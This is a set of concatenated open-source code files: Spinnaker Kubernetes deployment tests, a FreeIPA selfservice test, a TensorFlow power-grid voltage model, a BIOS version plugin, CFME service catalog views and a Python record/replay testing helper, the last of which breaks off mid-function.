'app': self.TEST_APP
},
'account': self.bindings['SPINNAKER_KUBERNETES_V2_ACCOUNT'],
'source': 'text',
'type': 'deployManifest',
'user': '[anonymous]',
'manifests': [manifest],
}],
description='Deploy manifest',
application=self.TEST_APP)
builder = kube.KubeContractBuilder(self.kube_v2_observer)
(builder.new_clause_builder('ConfigMap created',
retryable_for_secs=15)
.get_resources(
'configmap',
extra_args=[name, '--namespace', self.TEST_NAMESPACE])
.EXPECT(self.mp.config_map_key_value_predicate('value', value)))
return st.OperationContract(
self.new_post_operation(
title='deploy_manifest', data=payload, path='tasks'),
contract=builder.build())
def deploy_deployment_with_config_map(self, versioned):
"""Creates OperationContract for deploying a configmap along with a deployment
mounting this configmap.
To verify the operation, we just check that the deployment was created with
the correct configmap mounted
"""
deployment_name = self.TEST_APP + '-deployment'
deployment = self.mf.deployment(deployment_name, 'library/nginx')
configmap_name = self.TEST_APP + '-configmap'
configmap = self.mf.config_map(configmap_name, {'key': 'value'})
if not versioned:
configmap['metadata']['annotations'] = {'strategy.spinnaker.io/versioned': 'false'}
self.mf.add_configmap_volume(deployment, configmap_name)
payload = self.agent.make_json_payload_from_kwargs(
job=[{
'cloudProvider': 'kubernetes',
'moniker': {
'app': self.TEST_APP
},
'account': self.bindings['SPINNAKER_KUBERNETES_V2_ACCOUNT'],
'source': 'text',
'type': 'deployManifest',
'user': '[anonymous]',
'manifests': [deployment, configmap],
}],
description='Deploy manifest',
application=self.TEST_APP)
builder = kube.KubeContractBuilder(self.kube_v2_observer)
(builder.new_clause_builder('Deployment created',
retryable_for_secs=15)
.get_resources(
'deploy',
extra_args=[deployment_name, '--namespace', self.TEST_NAMESPACE])
.EXPECT(self.mp.deployment_configmap_mounted_predicate(configmap_name)))
return st.OperationContract(
self.new_post_operation(
title='deploy_manifest', data=payload, path='tasks'),
contract=builder.build())
def deploy_config_map(self, version):
"""Creates OperationContract for deploying a versioned configmap
    To verify the operation, we just check that the configmap was created with
    the correct 'version' value.
"""
bindings = self.bindings
name = self.TEST_APP + '-configmap'
payload = self.agent.make_json_payload_from_kwargs(
job=[{
'cloudProvider': 'kubernetes',
'moniker': {
'app': self.TEST_APP
},
'account': bindings['SPINNAKER_KUBERNETES_V2_ACCOUNT'],
'source': 'text',
'type': 'deployManifest',
'user': '[anonymous]',
'manifests': [self.mf.config_map(name, {'version': version})],
}],
description='Deploy manifest',
application=self.TEST_APP)
builder = kube.KubeContractBuilder(self.kube_v2_observer)
(builder.new_clause_builder('ConfigMap created',
retryable_for_secs=15)
.get_resources(
'configmap',
extra_args=[name + '-' + version, '--namespace', self.TEST_NAMESPACE])
.EXPECT(self.mp.config_map_key_value_predicate('version', version)))
return st.OperationContract(
self.new_post_operation(
title='deploy_manifest', data=payload, path='tasks'),
contract=builder.build())
def save_configmap_deployment_pipeline(self, pipeline_name, versioned=True):
deployment_name = self.TEST_APP + '-deployment'
deployment = self.mf.deployment(deployment_name, 'library/nginx')
configmap_name = self.TEST_APP + '-configmap'
configmap = self.mf.config_map(configmap_name, {'key': 'value'})
if not versioned:
configmap['metadata']['annotations'] = {'strategy.spinnaker.io/versioned': 'false'}
self.mf.add_configmap_volume(deployment, configmap_name)
configmap_stage = {
'refId': 'configmap',
'name': 'Deploy configmap',
'type': 'deployManifest',
'cloudProvider': 'kubernetes',
'moniker': {
'app': self.TEST_APP
},
'account': self.bindings['SPINNAKER_KUBERNETES_V2_ACCOUNT'],
'source': 'text',
'manifests': [configmap],
}
deployment_stage = {
'refId': 'deployment',
'name': 'Deploy deployment',
'requisiteStageRefIds': ['configmap'],
'type': 'deployManifest',
'cloudProvider': 'kubernetes',
'moniker': {
'app': self.TEST_APP
},
'account': self.bindings['SPINNAKER_KUBERNETES_V2_ACCOUNT'],
'source': 'text',
'manifests': [deployment],
}
return self.ps.submit_pipeline_contract(pipeline_name, [configmap_stage, deployment_stage])
def execute_deploy_manifest_pipeline(self, pipeline_name):
deployment_name = self.TEST_APP + '-deployment'
configmap_name = self.TEST_APP + '-configmap'
bindings = self.bindings
payload = self.agent.make_json_payload_from_kwargs(
job=[{
'type': 'manual',
'user': '[anonymous]'
}],
description='Deploy manifest in ' + self.TEST_APP,
application=self.TEST_APP)
builder = kube.KubeContractBuilder(self.kube_v2_observer)
(builder.new_clause_builder('Deployment created',
retryable_for_secs=60)
.get_resources(
'deploy',
extra_args=[deployment_name, '--namespace', self.TEST_NAMESPACE])
.EXPECT(self.mp.deployment_configmap_mounted_predicate(configmap_name)))
return st.OperationContract(
self.new_post_operation(
title='Deploy manifest', data=payload,
path='pipelines/' + self.TEST_APP + '/' + pipeline_name),
contract=builder.build())
def deploy_deployment_with_docker_artifact(self, image):
"""Creates OperationContract for deploying and substituting one image into
a Deployment object
To verify the operation, we just check that the deployment was created with
the correct image.
"""
bindings = self.bindings
name = self.TEST_APP + '-deployment'
image_name = 'placeholder'
docker_artifact = self.__docker_image_artifact(image_name, image)
payload = self.agent.make_json_payload_from_kwargs(
job=[{
'cloudProvider': 'kubernetes',
'moniker': {
'app': self.TEST_APP
},
'account': bindings['SPINNAKER_KUBERNETES_V2_ACCOUNT'],
'source': 'text',
'type': 'deployManifest',
'user': '[anonymous]',
'manifests': [self.mf.deployment(name, image_name)],
'artifacts': [docker_artifact]
}],
description='Deploy manifest',
application=self.TEST_APP)
builder = kube.KubeContractBuilder(self.kube_v2_observer)
(builder.new_clause_builder('Deployment created',
retryable_for_secs=15)
.get_resources(
'deploy',
extra_args=[name, '--namespace', self.TEST_NAMESPACE])
.EXPECT(self.mp.deployment_image_predicate(image)))
return st.OperationContract(
self.new_post_operation(
title='deploy_manifest', data=payload, path='tasks'),
contract=builder.build())
def delete_kind(self, kind, version=None):
"""Creates OperationContract for deleteManifest
    To verify the operation, we just check that the targeted Kubernetes resource
    is no longer visible (or is in the process of terminating).
"""
bindings = self.bindings
name = self.TEST_APP + '-' + kind
payload = self.agent.make_json_payload_from_kwargs(
job=[{
'cloudProvider': 'kubernetes',
'type': 'deleteManifest',
'account': bindings['SPINNAKER_KUBERNETES_V2_ACCOUNT'],
'user': '[anonymous]',
'kinds': [ kind ],
'location': self.TEST_NAMESPACE,
'options': { },
'labelSelectors': {
'selectors': [{
'kind': 'EQUALS',
'key': 'app',
'values': [ self.TEST_APP ]
}]
}
}],
application=self.TEST_APP,
description='Destroy Manifest')
if version is not None:
name = name + '-' + version
builder = kube.KubeContractBuilder(self.kube_v2_observer)
(builder.new_clause_builder('Manifest Removed')
.get_resources(
kind,
extra_args=[name, '--namespace', self.TEST_NAMESPACE])
.EXPECT(self.mp.not_found_observation_predicate()))
return st.OperationContract(
self.new_post_operation(
title='delete_kind', data=payload, path='tasks'),
contract=builder.build())
class KubeV2ArtifactTest(st.AgentTestCase):
"""The test fixture for the KubeV2ArtifactTest.
This is implemented using citest OperationContract instances that are
created by the KubeV2ArtifactTestScenario.
"""
# pylint: disable=missing-docstring
@property
def scenario(self):
return citest.base.TestRunner.global_runner().get_shared_data(
KubeV2ArtifactTestScenario)
def test_a_create_app(self):
self.run_test_case(self.scenario.create_app())
def test_b1_deploy_deployment_with_docker_artifact(self):
self.run_test_case(self.scenario.deploy_deployment_with_docker_artifact('library/nginx'))
def test_b2_update_deployment_with_docker_artifact(self):
self.run_test_case(self.scenario.deploy_deployment_with_docker_artifact('library/redis'))
def test_b3_delete_deployment(self):
self.run_test_case(self.scenario.delete_kind('deployment'), max_retries=2)
def test_c1_create_config_map(self):
self.run_test_case(self.scenario.deploy_config_map('v000'))
def test_c2_noop_update_config_map(self):
self.run_test_case(self.scenario.deploy_config_map('v000'))
def test_c3_update_config_map(self):
self.run_test_case(self.scenario.deploy_config_map('v001'))
def test_c4_delete_configmap(self):
self.run_test_case(self.scenario.delete_kind('configmap', version='v001'), max_retries=2)
def test_d1_create_unversioned_configmap(self):
self.run_test_case(self.scenario.deploy_unversioned_config_map('1'))
def test_d2_update_unversioned_configmap(self):
self.run_test_case(self.scenario.deploy_unversioned_config_map('2'))
def test_d3_delete_unversioned_configmap(self):
self.run_test_case(self.scenario.delete_kind('configmap'), max_retries=2)
def test_e1_create_deployment_with_versioned_configmap(self):
self.run_test_case(self.scenario.deploy_deployment_with_config_map(True))
def test_e2_delete_deployment(self):
self.run_test_case(self.scenario.delete_kind('deployment'), max_retries=2)
def test_e3_delete_configmap(self):
self.run_test_case(self.scenario.delete_kind('configmap', version='v000'), max_retries=2)
def test_f1_create_configmap_deployment_pipeline(self):
self.run_test_case(self.scenario.save_configmap_deployment_pipeline('deploy-configmap-deployment'))
def test_f2_execute_configmap_deployment_pipeline(self):
self.run_test_case(self.scenario.execute_deploy_manifest_pipeline('deploy-configmap-deployment'))
def test_f3_delete_deployment(self):
self.run_test_case(self.scenario.delete_kind('deployment'), max_retries=2)
def test_f4_delete_configmap(self):
self.run_test_case(self.scenario.delete_kind('configmap', version='v000'), max_retries=2)
def test_z_delete_app(self):
# Give a total of a minute because it might also need
# an internal cache update
self.run_test_case(self.scenario.delete_app(),
retry_interval_secs=8, max_retries=8)
def main():
"""Implements the main method running this artifact test."""
defaults = {
'TEST_STACK': 'tst',
'TEST_APP': 'kubv2arti' + KubeV2ArtifactTestScenario.DEFAULT_TEST_ID
}
return citest.base.TestRunner.main(
parser_inits=[KubeV2ArtifactTestScenario.initArgumentParser],
default_binding_overrides=defaults,
test_case_list=[KubeV2ArtifactTest])
if __name__ == '__main__':
sys.exit(main())
| apache-2.0 | 2,528,857,640,949,448,000 | 35.116773 | 103 | 0.648698 | false |
tbabej/freeipa | ipatests/test_xmlrpc/test_selfservice_plugin.py | 1 | 9394 | # Authors:
# Rob Crittenden <[email protected]>
#
# Copyright (C) 2010 Red Hat
# see file 'COPYING' for use and warranty information
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
Test the `ipalib/plugins/selfservice.py` module.
"""
from ipalib import errors
from ipatests.test_xmlrpc.xmlrpc_test import Declarative
import pytest
selfservice1 = u'testself'
invalid_selfservice1 = u'bad+name'
@pytest.mark.tier1
class test_selfservice(Declarative):
cleanup_commands = [
('selfservice_del', [selfservice1], {}),
]
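    # Each entry below is a declarative test case: 'desc' is a human readable
    # description, 'command' is the (api_method, args, options) triple to run,
    # and 'expected' is the expected result structure or exception.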
tests = [
dict(
desc='Try to retrieve non-existent %r' % selfservice1,
command=('selfservice_show', [selfservice1], {}),
expected=errors.NotFound(
reason=u'ACI with name "%s" not found' % selfservice1),
),
dict(
desc='Try to update non-existent %r' % selfservice1,
command=('selfservice_mod', [selfservice1],
dict(permissions=u'write')),
expected=errors.NotFound(
reason=u'ACI with name "%s" not found' % selfservice1),
),
dict(
desc='Try to delete non-existent %r' % selfservice1,
command=('selfservice_del', [selfservice1], {}),
expected=errors.NotFound(
reason=u'ACI with name "%s" not found' % selfservice1),
),
dict(
desc='Search for non-existent %r' % selfservice1,
command=('selfservice_find', [selfservice1], {}),
expected=dict(
count=0,
truncated=False,
summary=u'0 selfservices matched',
result=[],
),
),
# Note that we add postalCode but expect postalcode. This tests
# the attrs normalizer.
dict(
desc='Create %r' % selfservice1,
command=(
'selfservice_add', [selfservice1], dict(
attrs=[u'street', u'c', u'l', u'st', u'postalcode'],
permissions=u'write',
)
),
expected=dict(
value=selfservice1,
summary=u'Added selfservice "%s"' % selfservice1,
result=dict(
attrs=[u'street', u'c', u'l', u'st', u'postalcode'],
permissions=[u'write'],
selfaci=True,
aciname=selfservice1,
),
),
),
dict(
desc='Try to create duplicate %r' % selfservice1,
command=(
'selfservice_add', [selfservice1], dict(
attrs=[u'street', u'c', u'l', u'st', u'postalcode'],
permissions=u'write',
),
),
expected=errors.DuplicateEntry(),
),
dict(
desc='Retrieve %r' % selfservice1,
command=('selfservice_show', [selfservice1], {}),
expected=dict(
value=selfservice1,
summary=None,
result={
'attrs': [u'street', u'c', u'l', u'st', u'postalcode'],
'permissions': [u'write'],
'selfaci': True,
'aciname': selfservice1,
},
),
),
dict(
desc='Retrieve %r with --raw' % selfservice1,
command=('selfservice_show', [selfservice1], {'raw':True}),
expected=dict(
value=selfservice1,
summary=None,
result={
'aci': u'(targetattr = "street || c || l || st || postalcode")(version 3.0;acl "selfservice:testself";allow (write) userdn = "ldap:///self";)',
},
),
),
dict(
desc='Search for %r' % selfservice1,
command=('selfservice_find', [selfservice1], {}),
expected=dict(
count=1,
truncated=False,
summary=u'1 selfservice matched',
result=[
{
'attrs': [u'street', u'c', u'l', u'st', u'postalcode'],
'permissions': [u'write'],
'selfaci': True,
'aciname': selfservice1,
},
],
),
),
dict(
desc='Search for %r with --pkey-only' % selfservice1,
command=('selfservice_find', [selfservice1], {'pkey_only' : True}),
expected=dict(
count=1,
truncated=False,
summary=u'1 selfservice matched',
result=[
{
'aciname': selfservice1,
},
],
),
),
dict(
desc='Search for %r with empty attrs and permissions' % selfservice1,
command=('selfservice_find', [selfservice1], {'attrs' : None, 'permissions' : None}),
expected=dict(
count=1,
truncated=False,
summary=u'1 selfservice matched',
result=[
{
'attrs': [u'street', u'c', u'l', u'st', u'postalcode'],
'permissions': [u'write'],
'selfaci': True,
'aciname': selfservice1,
},
],
),
),
dict(
desc='Search for %r with --raw' % selfservice1,
command=('selfservice_find', [selfservice1], {'raw':True}),
expected=dict(
count=1,
truncated=False,
summary=u'1 selfservice matched',
result=[
{
'aci': u'(targetattr = "street || c || l || st || postalcode")(version 3.0;acl "selfservice:testself";allow (write) userdn = "ldap:///self";)'
},
],
),
),
dict(
desc='Update %r' % selfservice1,
command=(
'selfservice_mod', [selfservice1], dict(permissions=u'read')
),
expected=dict(
value=selfservice1,
summary=u'Modified selfservice "%s"' % selfservice1,
result=dict(
attrs=[u'street', u'c', u'l', u'st', u'postalcode'],
permissions=[u'read'],
selfaci=True,
aciname=selfservice1,
),
),
),
dict(
desc='Retrieve %r to verify update' % selfservice1,
command=('selfservice_show', [selfservice1], {}),
expected=dict(
value=selfservice1,
summary=None,
result={
'attrs': [u'street', u'c', u'l', u'st', u'postalcode'],
'permissions': [u'read'],
'selfaci': True,
'aciname': selfservice1,
},
),
),
dict(
desc='Try to update %r with empty permissions' % selfservice1,
command=(
'selfservice_mod', [selfservice1], dict(permissions=None)
),
expected=errors.RequirementError(name='permissions'),
),
dict(
desc='Retrieve %r to verify invalid update' % selfservice1,
command=('selfservice_show', [selfservice1], {}),
expected=dict(
value=selfservice1,
summary=None,
result={
'attrs': [u'street', u'c', u'l', u'st', u'postalcode'],
'permissions': [u'read'],
'selfaci': True,
'aciname': selfservice1,
},
),
),
dict(
desc='Delete %r' % selfservice1,
command=('selfservice_del', [selfservice1], {}),
expected=dict(
result=True,
value=selfservice1,
summary=u'Deleted selfservice "%s"' % selfservice1,
)
),
dict(
desc='Create invalid %r' % invalid_selfservice1,
command=(
'selfservice_add', [invalid_selfservice1], dict(
attrs=[u'street', u'c', u'l', u'st', u'postalcode'],
permissions=u'write',
)
),
expected=errors.ValidationError(name='name',
error='May only contain letters, numbers, -, _, and space'),
),
]
| gpl-3.0 | -2,524,740,462,012,965,000 | 31.171233 | 166 | 0.459016 | false |
interpss/DeepMachineLearning | ipss.dml/py/single_net_random/predict_voltage_random_learningCuve.py | 1 | 3720 | '''
Copyright (C) 2005-17 www.interpss.org
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
'''
Use NN-model to predict the bus voltage for a set of randomly generated load changes
'''
from datetime import datetime
import numpy as np
import tensorflow as tf
import sys
sys.path.insert(0, '..')
import lib.common_func as cf
train_points = 1000
#
# load the IEEE-14Bus case
#
filename = 'testdata/ieee14.ieee'
noBus, noBranch = cf.ipss_app.loadCase(filename, 'BusVoltLoadChangeRandomTrainCaseBuilder')
print(filename, ' loaded, no of Buses, Branches:', noBus, ', ', noBranch)
# define model size
size = noBus * 2
#print('size: ', size)
# define model variables
W1 = tf.Variable(tf.zeros([size,size]))
b1 = tf.Variable(tf.zeros([size]))
# define model
def nn_model(data):
output = tf.matmul(data, W1) + b1
return output
# define loss
x = tf.placeholder(tf.float32, [None, size])
y = tf.placeholder(tf.float32)
error = tf.square(nn_model(x) - y)
loss = tf.reduce_sum(error)
# define training optimization
optimizer = tf.train.AdagradOptimizer(0.3)
train = optimizer.minimize(loss)
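# The model above is a single affine layer (y ~ x*W1 + b1) over vectors of
# length 2*noBus; training minimizes the summed squared error with Adagrad.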
init = tf.global_variables_initializer()
tf.summary.histogram('y',y)
tf.summary.histogram('x',x)
tf.summary.scalar('loss',loss)
merged_summary_op = tf.summary.merge_all()
# run the computation graph
with tf.Session() as sess :
sess.run(init)
summary_writer = tf.summary.FileWriter('D://logs//1',sess.graph)
# run the training part
# =====================
print('Begin training: ', datetime.now())
# retrieve training set
trainSet = cf.ipss_app.getTrainSet(train_points)
train_x, train_y = cf.transfer2PyArrays(trainSet)
train_x,aver_x,ran_x = cf.normalization(train_x);
train_y,aver_y,ran_y = cf.normalization(train_y);
# run the training part
for i in range(cf.train_steps):
summary_str = sess.run(merged_summary_op,{x:train_x, y:train_y})
summary_writer.add_summary(summary_str, i)
if (i % 1000 == 0) : print('Training step: ', i)
sess.run(train, {x:train_x, y:train_y})
print('End training: ', datetime.now())
'''
print('W1: ', sess.run(W1))
print('b1: ', sess.run(b1))
'''
# run the verification part
# =========================
testSize=100
mismatchSet = np.zeros((testSize,2))
# retrieve a test case
for i in range(testSize) :
#for factor in [0.45, 1.0, 1.55] :
testCase = cf.ipss_app.getTestCase()
test_x, test_y = cf.transfer2PyArrays(testCase)
test_x = np.divide(np.subtract(test_x,aver_x),ran_x)
# compute model output (network voltage)
model_y = sess.run(nn_model(x), {x:test_x})
#printArray(model_y, 'model_y')
netVoltage = cf.transfer2JavaDblAry(model_y[0]*ran_y+aver_y, size)
mismatchSet[i] = np.array([cf.ipss_app.getMismatch(netVoltage)[0],cf.ipss_app.getMismatch(netVoltage)[1]])
train_m,aver_m,ran_m = cf.normalization(mismatchSet);
print('model out mismatch(aver): ', aver_m)
print('model out mismatch(range): ', ran_m)
| apache-2.0 | 6,591,949,553,571,193,000 | 29.525424 | 114 | 0.633602 | false |
intel-ctrlsys/actsys | actsys/control/commands/bios/bios_version.py | 1 | 1059 | # -*- coding: utf-8 -*-
#
# Copyright (c) 2017 Intel Corp.
#
"""
Get BIOS version
"""
from ...commands.command import CommandResult
from ...plugin import DeclarePlugin
from .bios import BiosCommand
@DeclarePlugin('bios_version', 100)
class BiosVersionCommand(BiosCommand):
"""Bios Get Version Command"""
def __init__(self, device_name, configuration, plugin_manager, logger=None):
"""Retrieve dependencies and prepare for power on"""
BiosCommand.__init__(self, device_name, configuration, plugin_manager, logger)
def execute(self):
"""Execute the command"""
try:
self.setup()
result = []
result_dict = self.node_controller.get_version(self.device_data, self.bmc_data)
for key, value in result_dict.items():
command_result = CommandResult(0, value)
command_result.device_name = key
result.append(command_result)
except Exception as ex:
return [CommandResult(255, str(ex))]
return result
| apache-2.0 | -7,822,982,988,380,406,000 | 31.090909 | 91 | 0.623229 | false |
RedHatQE/cfme_tests | cfme/services/service_catalogs/__init__.py | 1 | 3979 | import importscan
import sentaku
from widgetastic.utils import deflatten_dict
from widgetastic.utils import Parameter
from widgetastic.utils import ParametrizedLocator
from widgetastic.utils import ParametrizedString
from widgetastic.widget import ParametrizedView
from widgetastic.widget import Select
from widgetastic.widget import Text
from widgetastic.widget import View
from widgetastic_patternfly import BootstrapSelect
from widgetastic_patternfly import Input
from cfme.common import Taggable
from cfme.exceptions import ItemNotFound
from cfme.utils.appliance import Navigatable
from cfme.utils.update import Updateable
from cfme.utils.wait import TimedOutError
class ServiceCatalogs(Navigatable, Taggable, Updateable, sentaku.modeling.ElementMixin):
"""
    Main Service Catalogs class, used to context-switch between the UI and
    SSUI. All of the methods below are implemented on both the UI and SSUI
    sides.
"""
order = sentaku.ContextualMethod()
add_to_shopping_cart = sentaku.ContextualMethod()
def __init__(self, appliance, catalog=None, name=None, stack_data=None,
dialog_values=None, ansible_dialog_values=None):
Navigatable.__init__(self, appliance=appliance)
self.catalog = catalog
self.name = name
self.stack_data = stack_data
self.dialog_values = dialog_values
self.ansible_dialog_values = ansible_dialog_values
self.parent = self.appliance.context
class BaseOrderForm(View):
"""Represents the order form of a service.
This form doesn't have a static set of elements apart from titles and buttons. In the most cases
the fields can be either regular inputs or dropdowns. Their locators depend on field names. In
order to find and fill required fields a parametrized view is used here. The keys of a fill
dictionary should match ids of the fields. For instance there is a field with such html
<input id="some_key"></input>, so a fill dictionary should look like that:
{"some_key": "some_value"}
"""
title = Text('#explorer_title_text')
dialog_title = Text(".//div[@id='main_div']//h2")
@ParametrizedView.nested
class fields(ParametrizedView): # noqa
PARAMETERS = ("key",)
input = Input(id=Parameter("key"))
select = Select(id=Parameter("key"))
param_input = Input(id=ParametrizedString("param_{key}"))
dropdown = BootstrapSelect(locator=ParametrizedLocator(
".//div[contains(@class, 'bootstrap-select')]/select[@id={key|quote}]/.."))
param_dropdown = BootstrapSelect(locator=ParametrizedLocator(
".//div[contains(@class, 'bootstrap-select')]/select[@id='param_{key}']/.."))
@property
def visible_widget(self):
for widget in (self.input, self.dropdown, self.param_input,
self.param_dropdown, self.select):
try:
widget.wait_displayed('2s')
return widget
except TimedOutError:
pass
else:
raise ItemNotFound("Visible widget is not found")
def read(self):
return self.visible_widget.read()
def fill(self, value):
return self.visible_widget.fill(value)
def fill(self, fill_data):
values = deflatten_dict(fill_data)
was_change = False
self.before_fill(values)
for key, value in values.items():
widget = self.fields(key)
if value is None:
self.logger.debug('Skipping fill of %r because value was None', key)
continue
try:
if widget.fill(value):
was_change = True
except NotImplementedError:
continue
self.after_fill(was_change)
return was_change
from . import ui, ssui # NOQA last for import cycles
importscan.scan(ui)
importscan.scan(ssui)
| gpl-2.0 | -2,037,682,114,986,794,200 | 37.259615 | 100 | 0.656195 | false |
chmcewan/Numnum | src/Numnum.py | 1 | 14131 | import numpy as np
import numpy.matlib
import scipy as sp
import scipy.io as sio
import inspect
import pdb
from numbers import Number
import warnings
import pdb
singleton = None
class Result:
def __init__(this, name, passes=0, total=0):
this.name = name
this.passes = float(passes)
this.total = float(total)
def __iadd__(this, that):
this.passes = this.passes + that.passes
this.total = this.total + that.total
return this
def passed(this):
return this.passes == this.total
def __repr__(this):
fr = 0.0
if this.total > 0:
fr = this.passes / this.total
return "%s: %d%% pass (%d/%d)" % (this.name, round(fr*100.0), this.passes, this.total )
class Numnum:
def __init__(this):
this.idxn = 0
this.idxu = 0
this.ids = {}
this.ctx = []
this.gid = 0
this.state = {}
this.mode = 0
this.unit = 0
this.run = None
this.depth = 0
def push(this):
""" push new context onto stack """
name = caller(1)
if name in this.ids:
this.ids[name] = this.ids[name] + 1
else:
this.ids[name] = 1
ctx = {}
ctx["name"] = name
ctx["run"] = this.ids[name]
this.ctx.append(ctx)
def pop(this):
""" pop context off of stack """
ctx = this.ctx.pop()
if this.mode > 0:
if ctx["name"] not in this.state:
this.state[ctx["name"]] = []
runs = this.state[ctx["name"]]
if ctx["run"] == len(runs)+1:
runs.append(ctx)
else:
raise Exception("wtf: %d ~ %d" % (ctx["run"] , len(runs)))
# this.state[ctx.name] = runs
def validate(this, str, *args):
ctx = this.ctx[-1]
if this.mode > 0:
ctx[str] = args
else:
funs = this.state[ctx["name"]]
if type(funs) != list:
funs = [funs]
fun = funs[ ctx["run"] - 1 ]
vals = fun[str]
this._validate(vals, *args)
# this.ctx{end} = ctx;
def _validate(this, vals, *args):
if len(vals) != len(args):
warnings.warn("Unequal number of values: %d != %d" % (len(vals)/2, len(args)/2), stacklevel=3)
# Assume lost trailing arguments are optional
for i in range(0, min(len(args), len(vals)), 2):
key_a = args[i]
val_a = args[i+1]
key_b = vals[i]
val_b = vals[i+1]
equivalent(val_a, val_b, key_a, key_b)
def parse(obj):
ans = obj
if type(obj) == dict:
for key in ans:
ans[key] = parse(ans[key])
elif isinstance(obj, sio.matlab.mio5_params.mat_struct):
ans = {}
for key in obj._fieldnames:
ans[key] = parse(obj.__dict__[key])
elif isinstance(obj,np.ndarray):
if obj.dtype == np.dtype('O'):
# cell-array, otherwise leave alone. Assumes 1D.
ans = []
for item in obj:
ans.append(parse(item))
return ans
def str2func(name, offset=0):
scope = inspect.stack()[1+offset][0].f_globals
if name in scope:
return scope[name]
else:
for s in scope:
if inspect.ismodule(scope[s]):
# print("str2func recursing into '%s'" % s)
for m in inspect.getmembers(scope[s]):
if m[0] == name:
return m[1]
def get_instance():
global singleton
if singleton == None:
singleton = Numnum()
return singleton
def named_args(kv):
v = []
for i in range(0, len(kv), 2):
v.append(kv[i+1])
return v
def unnamed_args(k):
v = []
if type(k) == np.ndarray or type(k) == list:
for i in range(0, len(k)):
            v.append(k[i])  # k[i+1] skipped the first element and ran past the end
else:
v.append(k)
return v
def replay(filename, mode=0):
this = get_instance()
this.idxn = 0
this.idxu = 0
this.ids = {}
this.ctx = []
this.gid = 0
this.state = parse(sio.loadmat(filename, chars_as_strings=True, struct_as_record=False, squeeze_me=True))
this.mode = -1
this.unit = 1
this.run = None
this.depth = 0
testname = None
if type(mode) == str:
testname = mode
mode = -1
# print(filename)
test_results = {}
# run integration test
if mode == 0 or mode > 0:
f = str2func(this.state["numnum_function"], 1)
v = unnamed_args(this.state["numnum_varargin"])
f(*v)
print("integration %s: pass" % this.state["numnum_function"])
# run unit tests
if mode == 0 or mode < 0:
total_tests = 0
for key in this.state.keys():
if testname and (testname != key):
continue
if not( key.startswith("numnum_") or key.startswith("_") ):
runs = this.state[key]
f = str2func(key, 1)
if f == None:
print('Skipping %s...\n' % key)
continue
if type(runs) != list:
runs = [runs]
passes = 0
for j in range(0, len(runs)):
run = runs[j]
arg = named_args(run["arg"])
ret = named_args(run["ret"])
this.mode = 0 # disable verification in functions...
this.run = run # ...except top-level
this.depth = 0
this.unit = 1 # keep random generation enabled
this.idxn = 0 # reset random numbers
this.idxu = 0
try:
# Invoke. Return values validated internally.
f( *arg )
passes = passes + 1
except Exception as e:
print(e.message)
print(filename)
pass
#raise
this.mode = -1
this.run = None
this.depth = 0
#total_tests = total_tests + 1
#try:
# if len(ret) == 1:
# equivalent( ret[0], results, run["ret"][0], run["ret"][0] )
# else:
# for k in range(0, len(ret)):
# equivalent( ret[k], results[k], run["ret"][2*k], run["ret"][2*k] )
# passes = passes + 1;
#except Exception as e:
# print(e.message)
# pass
#errstr= "%s: %d%% pass (%d/%d)" % (run["name"], round(float(passes)/float(len(runs))*100.0), passes, len(runs) )
#print(errstr)
#if passes != len(runs):
# raise Exception(errstr)
#assert passes == len(runs)
test_results[key] = Result( key, passes, len(runs) )
#if total_tests == 0:
# raise Exception("No unit tests found");
return test_results
def record(filename, f, *args):
this = get_instance()
this.idxn = 0
this.idxu = 0
this.ids = {}
this.ctx = []
this.gid = 0
this.state = {}
this.mode = 1
this.unit = 0
this.run = None
this.depth = 0
n = 10000
this.state["numnum_randn"] = np.random.standard_normal((1, n))
this.state["numnum_rand"] = np.random.random( (1, n) )
this.state["numnum_function"] = "" # FIXME
this.state["numnum_varargin"] = args
f(*args)
sio.savemat(filename, this.state)
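# Usage sketch (illustrative only; the file name and my_pipeline are made up). The
# recorded function is expected to call arguments()/values()/returns() itself, the
# same way the helpers above hook into instrumented code:
#
#   record("pipeline_run.mat", my_pipeline, data)    # capture args/returns of every call
#   results = replay("pipeline_run.mat", -1)         # unit-test mode: re-run and compare
#   for name, result in results.items():
#       print(result)                                # e.g. "my_pipeline: 100% pass (3/3)"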
def caller(offset=0):
return inspect.stack()[2+offset][3]
def arguments(*args):
this = get_instance()
this.depth = this.depth + 1
if this.mode:
this.push()
this.validate('arg', *args)
elif this.run and this.depth == 1:
this._validate(this.run['arg'], *args)
def returns(*args):
this = get_instance()
this.depth = this.depth - 1
if this.mode:
this.validate('ret', *args)
this.pop()
elif this.run and this.depth == 0:
this._validate(this.run['ret'], *args)
def values(*args):
this = get_instance()
if this.mode:
this.validate('val', *args)
elif this.run and this.depth == 1:
this._validate(this.run['val'], *args)
# Reproducible deterministic random number generation
def randn(r, c):
this = get_instance()
v = np.random.standard_normal((r, c))
if this.mode or this.unit:
idx = 0 # needs to be deterministic for unit tests
for i in range(0, r):
for j in range(0, c):
v[i,j] = this.state["numnum_randn"][ idx % this.state["numnum_randn"].shape[0] ]
idx = idx + 1
return v
# Reproducible deterministic random number generation
def rand(r, c):
this = get_instance()
v = np.random.random((r, c))
if this.mode or this.unit:
idx = 0 # needs to be deterministic for unit tests
for i in range(0, r):
for j in range(0, c):
v[i,j] = this.state["numnum_rand"][ idx % this.state["numnum_rand"].shape[0] ]
idx = idx + 1
return v
# Reproducible deterministic random number generation
def randperm(n):
this = get_instance()
    v = np.random.permutation(n)  # a recursive randperm(n) call here never terminated
    if this.mode or this.unit:
        # FIXME: slow and dumb...
        raise Exception('Not implemented')
    return v
# Fix handling of 1d ndarrays
def insist(v, rows, cols):
if rows == 0 and cols == 0:
raise Exception("Both rows and cols connot be zero")
if type(v) == float:
v = np.ones(shape=(1,1), dtype=np.float64) * v
if type(v) == int:
v = np.ones(shape=(1,1), dtype=np.float64) * float(v)
